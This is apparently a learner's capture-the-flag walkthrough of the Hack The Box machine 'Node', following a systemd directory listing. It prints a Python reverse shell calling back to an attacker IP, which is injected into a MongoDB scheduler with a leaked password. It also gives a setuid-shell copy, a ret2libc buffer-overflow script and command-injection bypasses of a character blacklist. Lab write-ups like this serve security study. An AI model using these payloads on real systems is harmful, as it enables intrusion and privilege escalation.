lrwxrwxrwx 1 root root 36 Aug 29 2017 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Aug 29 2017 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Aug 29 2017 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Aug 29 2017 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 Aug 29 2017 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Aug 29 2017 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 24 Aug 29 2017 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 31 Aug 29 2017 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 30 Aug 29 2017 systemd-update-utmp.service -> ../systemd-update-utmp.service
lrwxrwxrwx 1 root root 30 May 10 2016 plymouth-read-write.service -> ../plymouth-read-write.service
lrwxrwxrwx 1 root root 25 May 10 2016 plymouth-start.service -> ../plymouth-start.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Aug 29 2017 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Aug 29 2017 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Aug 29 2017 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Aug 29 2017 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 Aug 29 2017 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Aug 29 2017 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 14 Jan 12 2017 dbus.socket -> ../dbus.socket

/lib/systemd/system/sigpwr.target.wants:
total 0
lrwxrwxrwx 1 root root 36 Aug 29 2017 sigpwr-container-shutdown.service -> ../sigpwr-container-shutdown.service

/lib/systemd/system/systemd-resolved.service.d:
total 4.0K
-rw-r--r-- 1 root root 200 Jul 17 2017 resolvconf.conf

/lib/systemd/system/systemd-timesyncd.service.d:
total 4.0K
-rw-r--r-- 1 root root 251 Jul 5 2017 disable-with-time-daemon.conf

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Aug 29 2017 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Aug 29 2017 systemd-remount-fs.service -> ../systemd-remount-fs.service

/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r--r-- 1 root root 290 Jul 5 2017 debian.conf

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Aug 29 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/resolvconf.service.wants:
total 0
lrwxrwxrwx 1 root root 42 Aug 29 2017 systemd-networkd-resolvconf-update.path -> ../systemd-networkd-resolvconf-update.path

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Aug 29 2017 getty-static.service -> ../getty-static.service

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Aug 29 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/busnames.target.wants:
total 0

/lib/systemd/system/runlevel1.target.wants:
total 0

/lib/systemd/system/runlevel2.target.wants:
total 0

/lib/systemd/system/runlevel3.target.wants:
total 0

/lib/systemd/system/runlevel4.target.wants:
total 0

/lib/systemd/system/runlevel5.target.wants:
total 0

/lib/systemd/system-sleep:
total 4.0K
-rwxr-xr-x 1 root root 92 Mar 17 2016 hdparm

/lib/systemd/system-generators:
total 680K
-rwxr-xr-x 1 root root 71K Jul 19 2017 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root 59K Jul 19 2017 systemd-dbus1-generator
-rwxr-xr-x 1 root root 43K Jul 19 2017 systemd-debug-generator
-rwxr-xr-x 1 root root 79K Jul 19 2017 systemd-fstab-generator
-rwxr-xr-x 1 root root 39K Jul 19 2017 systemd-getty-generator
-rwxr-xr-x 1 root root 119K Jul 19 2017 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root 39K Jul 19 2017 systemd-hibernate-resume-generator
-rwxr-xr-x 1 root root 39K Jul 19 2017 systemd-insserv-generator
-rwxr-xr-x 1 root root 35K Jul 19 2017 systemd-rc-local-generator
-rwxr-xr-x 1 root root 31K Jul 19 2017 systemd-system-update-generator
-rwxr-xr-x 1 root root 103K Jul 19 2017 systemd-sysv-generator
-rwxr-xr-x 1 root root 11K Apr 16 2016 lvm2-activation-generator

/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 869 Jul 19 2017 90-systemd.preset

/lib/systemd/network:
total 12K
-rw-r--r-- 1 root root 404 Jul 19 2017 80-container-host0.network
-rw-r--r-- 1 root root 482 Jul 19 2017 80-container-ve.network
-rw-r--r-- 1 root root 80 Jul 19 2017 99-default.link

/lib/systemd/system-shutdown:
total 0

Interesting Files

images/816-1.png
images/816-2.png

images/816-3.png

images/816-4.png
images/816-5.png

LinEnum finds:

from the networking portion of the report we see a port listening on node's localhost
images/814-1.png

processes owned and ran by Tom:
images/814-2.png
images/814-3.png
images/814-4.png


escalation method 1: mongo_db rev shell

First, here's a diagram on how mongodb works courtesy of Rana Khalil!

images/817-1.png
we can see based off tom's owned and ran processes that /var/scheduler has a javascript file app.js that may help us out:

no credentials besides mark again but we see that the scheulded function goes into the scheduler database and runs all the tasks within it, we may be able to remote back to our attacking machine if we inject a reverse_shell to be ran through the scheduler
images/817-2.png

pentest monkey reverse shell

pentest monkey reverse shell cheat sheet
images/819-1.png
tweak it so it points back to us:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.62",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

now we'll need to insert this command within the mongo_db and execute it

excalating to Tom w/ reverse shell

Lets attempt to connect to Node's mongo database and escalate to Tom

- we have mark's password 5AYRft73VtFpc84k
- we also know from the Networking report off of our LinEnum.sh script that MongoDB is running off Node's localhost on port 27017

mongo -u mark -p 5AYRft73VtFpc84k localhost:27017/scheduler
images/818-1.png
we're in!
now to upload our reverse shell as a document:

db.tasks.find()
images/818-2.png
we see there are no tasks at the moment so lets add one with a python reverse shell from pentest monkey

keep in mind mongo likes commands inserted in json format:
db.tasks.insert({cmd: "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.62\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"})


images/818-3.png

finally, set up a listener on our attack machine and wait for mongo to execute it
images/818-4.png

escalating method 2: copy privileged shell (ippsec)

we can also priv esc by copying a privileged shell over in a mongodb insert command

copying bash over to the /tmp directory with chmod designated privileges is what ippsec did:
db.tasks.insert({cmd: "cp /bin/bash /tmp/st0ve; chmod u+s /tmp/st0ve;"})
images/822-1.png
images/822-2.png

why we use chmod u+s :
images/822-3.png

images/822-4.png

tom owns it because tom owns the schduler: we can confirm with ps aux | grep schedule
images/822-5.png

now we see our EUID is tom
images/822-6.png

privesc to root

find / -perm -4000 2>/dev/null

find / -perm -4000 2>/dev/null
will show us what other processes have Set UID bits active on them
images/820-1.png

images/820-2.png
/usr/local/bin/backup is a file worth looking into from here

/usr/local/bin/backup

lets xfer the backup file to our attacking machine
images/829-1.png

images/829-2.png

we see the md5 sums match verifying we transfered the correct file

strace ./backup

strace is a diagnostic, debugging and instructional userspace utility for Linux. It is used to monitor and tamper with interactions between processes and the Linux kernel, which include system calls, signal deliveries, and changes of process state. The operation of strace is made possible by the kernel feature known as ptrace.

we'll run it against the ./backup process we downloaded off our victim machine
images/830-1.png

radar 2

time to follow the binary (ippsec)

analyze with aaa
images/831-1.png
print out function list with afl

images/831-2.pngvimages/831-3.png

vvv to handle visualization mode


takes 3 arguments


images/832-1.png
we see if backpup doesnt have 3 arguments it immedately closes:

images/832-2.png

strace

when we run strace on the file we see it looks for keys from the /etc/myplace/keys folder
images/833-1.png

images/833-2.png

and when we look at node we see that folder contains 3 keys

images/833-3.png
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110

./backup (trolled)

the app.js file shows us there are 3 arguments we need to run the backup processimages/827-1.png
images/827-2.png

and we can find the backup keys in the /etc/myplace/keys
images/827-3.png
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110




given these variables, the code we want
./backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /root



we get this output
images/827-4.png

lets put this into a file and decode it
images/827-5.png
images/827-6.png
images/827-7.png

didnt work lets try 7zip
images/827-8.png
images/827-9.png we get a password prompt, lets use magicword

we see we have root.txt in our folder! lets open it and see...
images/827-10.png

images/827-11.png

...oof trollface'd

badchars

time to check out the backup in /usr/local/bin/backup

images/825-1.png
seems we can't view it, so lets netcat the base64 of it back to our attacking machine and name it backup

theres a blacklist associated with this file by looking at binary ninja (ippsec) there are a list of bad characters that auto-outputs a troll face if we try to look at root.txt
https://www.youtube.com/watch?v=sW10TlZF62w&t=48m


ippsec went through each check on bad characters by checking their respective hex formats and made the same list as below, heres what each bad char block looked like:
images/825-2.png
“;" is our bad character in this block
images/825-3.png

after going through every bad character block wihtin the process, these are the characters that will trigger the trollface
images/825-4.png
badcharacters are /root ; & ' $ /etc // /




intended privesc- Buffer Overflow

to be added when I know wtf im doing
okay a few hours later and I'm feeling at least confident enough to follow ippsec's walkthrough, fyi my butt is fully clenched

lets fire up gdb (btw install PEDA - Python Exploit Development Assistance for GDB first through this link
https://github.com/longld/peda )

NOTE: you need to create the a file in /etc/myplace/keys with one of the 3 backup keys in order for ./backup to run propely on the attacking machine because it uses that directory in the source code, and you need to be able to run ./backup on your attacking machine in order to pull the overflow off through GDB

(lets swap our local key file to have a short string like ‘abc
images/838-1.png
images/838-2.png

images/838-3.png
images/838-4.png

first order of business is to check which compile-time protections are enabled:
checksec
images/838-5.png

lets delete any breakpoints
images/838-6.png...none were placed but its good to check


and put a breakpoint on main:
looking at binary ninja, we find strcopy, which is an outdated function and should actually be strncopy
we'll pick a function that calls strcopy to target
images/838-7.png

there's a function right before it so lets run our backup script twice to see if it will display what we're archiving and prove it overflows
images/838-8.png







check for overflowed buffer

heading back to our bash terminal

because we see the computer screen output along with the text of the strcopy we want to overflow, we can tell this is vulnerable as long as we sub “-q” out with anything
images/841-1.png

pattern create

lets throw a pattern'd string to strcopy to narrow down where the EIP or extended instruction pointer is
pattern create 600
images/842-1.png

now lets take the pattern and run it with arguments in gdb (abc is our local key)
images/842-2.png

we see we get the trollface hexcode again,

a closer look shows there are badcharacters in this pattern, lets eye things out with As for now but check my buff overflow notes in TCM's overflow and there should be a way to exclude bad characters with the pattern call
images/842-3.png

python -c 'print "A"*520'

lets flood the program with a's

images/843-1.png

images/843-2.png

we see we overflowed past the eip buffer,images/843-3.png lets try fewer a's

images/843-4.png

images/843-5.png
no a's to be seen but we should be really close, lets add 2 a's and...

images/843-6.png
we notice there are 2 "41's" which are hex for a's! which means

now we know the
first 512 bytes are junk
513-516th bit is where the eip is located!

images/843-7.png

images/843-8.png










buf.py

this is the code for our buffer overflow
images/844-1.png
lets swap over to our shell on node and save the exploit locally

images/844-2.png
from subprocess import call
import struct

libc_base_addr = 0xb75e0000

system_off = 0x00040310
exit_off = 0x00033260
arg_off = 0x00162bac

system_addr = struct.pack("<I",libc_base_addr+system_off)
exit_addr = struct.pack("<I", libc_base_addr+exit_off)
arg_addr = struct.pack("<I", libc_base_addr+arg_off)

buf = "A"*512
buf += system_addr
buf += exit_addr
buf += arg_addr

i = 0
while (i<512):
print "Try %s" %i
i += i
ret = call(["/usr/local/bin/backup", buf])


find libc, system_off, exit_off and arg_off starting address

Next task is to find the memory addresses of libc, system_off, exit_off and arg_off

ldd /usr/local/bin/backup | grep libc .so.6
images/846-1.png

take (0xf75c4000)
and set libc_base_addr = 0xf75c4000

note: the process address is randomized because of ASLR
images/846-2.png


----------------------------------------------------------------------------------------------------------------------------------------------------
next we need the system_off bit address

readelf -s /lib32/libc.so.6 | grep system
images/846-3.png


take the address of the last one
and set system_off = 0003a940
images/846-4.png



----------------------------------------------------------------------------------------------------------------------------------------------------
next we need the exit_off address
readelf -s /lib32/libc.so.6 | grep exit
images/846-5.png

take the weak one images/846-6.png
and set exit_off = 0002e7d0


----------------------------------------------------------------------------------------------------------------------------------------------------

next we need the arg_off bit address
which is a little different to retrieve,
strings -a -t x /lib32/libc.so.6 | grep bin/sh
images/846-7.png
set arg_off = 15900b

----------------------------------------------------------------------------------------------------------------------------------------------------
given our libc, system_off, exit_off and arg_off memory addresses our
buff.py should look like the following:

images/846-8.png


/lib32 files

images/847-1.png

update ret

we have to modify the return function to properly run our backup process

which takes an arbitrary -q, the backup_key found in /etc/myplace/keys and the buffer

ret = call(["/usr/local/bin/backup" “st0ve”, “<key>”, buf])
images/848-1.png
now lets try this out!

run buf.py win

Here is our finished script

we have all the addresses accounted for and backup's cmd arguments in a loop,
images/849-1.png

images/849-2.png

after some patience and many loops, we see a prompt:
images/849-3.png
we got root!

unintended privesc methods

By replacing some characters with wildcards, however, it is possible to evade the blacklist and grab the root flag:

avoiding bad characters to extract root.txt

now if we run ./backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 root, we avoid any badchars and can successfully extract the entire root folder

if you go back into the / directory and call
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 root

you get this unintended response:
images/828-1.png

decode and unzip and....

save the incredibly long base64 string to a text file and decode it with base64

images/834-1.png

we get the entire contents of root onto our machine and
images/834-2.png

we get our root flag!

creating a symlink

A symbolic link is a file that points to another file.
Let’s point the root.txt file to a file we'll create called alt-file.txt.


images/836-1.png
ln -s /root/root.txt altfile
images/836-2.png

now we'll run backup and since altfile doesn't contain any bad characters we'll extract its backup without any problems
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 altfile
images/836-3.png


we can pipe the base64 straight to a zip file and unzip it frm there:
images/836-4.png
images/836-5.png

wildcards

we see that astericks aren't filtered as bad characters, we can sub them in for o's

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /r**t/r**t.txt
images/837-1.png

this is the same base64 output from our symlink which will decode to our root flag

command injection

theres a way to take advantage of the printf function to bypass the badcharacter blacklist

NRPE had this same vulnerability and was famous for it
images/839-1.png

simply put if you call backup with an unclosed quoted argument, you can inject a bash shell before you close the next quote

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 altfile "asd
>/bin/bash
>asd"
images/839-2.png
images/839-3.png
images/839-4.png

you can also do this with printf as the directory argument
“$(printf ‘aaa\n/bin/sh\nasd')" to add the ‘\n’ line breaks in one line
images/839-5.png







user/root

images/826-1.png
e1156acc3574e04b06908ecf76be91b1

images/826-2.png
1722e99ca5f353b362556a62bd5e6be0

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1974-1.png